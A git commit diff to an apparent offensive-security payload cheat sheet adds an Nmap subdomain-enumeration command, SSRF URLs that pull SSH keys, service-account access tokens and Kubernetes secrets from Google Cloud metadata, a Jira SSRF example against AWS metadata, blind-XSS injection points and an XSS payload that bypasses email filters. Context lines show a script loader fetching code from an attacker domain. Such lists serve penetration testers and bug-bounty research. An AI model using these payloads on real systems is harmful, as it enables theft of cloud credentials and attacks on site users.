Blind XSS endpoint + SSRF Google + Nmap subdomains

2024-12-19 19:06:12 +00:00 · 2018-11-25 15:44:17 +01:00 · 2018-11-25 15:44:17 +01:00 · 928a454531
commit 928a454531
parent b34cff5a74
3 changed files with 30 additions and 0 deletions
--- a/Resources/Subdomains
+++ b/Resources/Subdomains
@ -12,6 +12,7 @@
  * Aquatone (Ruby and Go versions)
  * AltDNS
  * MassDNS
  * Nmap
 * Subdomain take over
  * tko-subs
  * HostileSubBruteForcer
@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt"
 cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt
 ```
 ### Using Nmap
 ```powershell
 nmap -sn --script hostmap-crtsh host_to_scan.tld
 ```
 ## Subdomain take over
 Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
--- a/injection/README.md
+++ b/injection/README.md
@ -330,6 +330,8 @@ http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
 http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
 ```
 E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
 ### SSRF URL for Google Cloud
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
@ -356,6 +358,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
 Interesting files to pull out:
 - SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
 - Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
 - Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
 ### SSRF URL for Digital Ocean
 Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
@ -478,3 +486,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
 - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
 - [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
--- a/injection/README.md
+++ b/injection/README.md
@ -325,6 +325,14 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver)
 - [ezXSS - ssl](https://github.com/ssl/ezXSS)
 ### Blind XSS endpoint
 - Contact forms
 - Ticket support
 - Referer Header
  - Custom Site Analytics
  - Administrative Panel logs
 ## Polyglot XSS
 Polyglot XSS - 0xsobky
@ -507,6 +515,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
 ```
 Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))
 ```javascript
 "><svg/onload=confirm(1)>"@x.y
 ```
 Bypass document blacklist
 ```javascript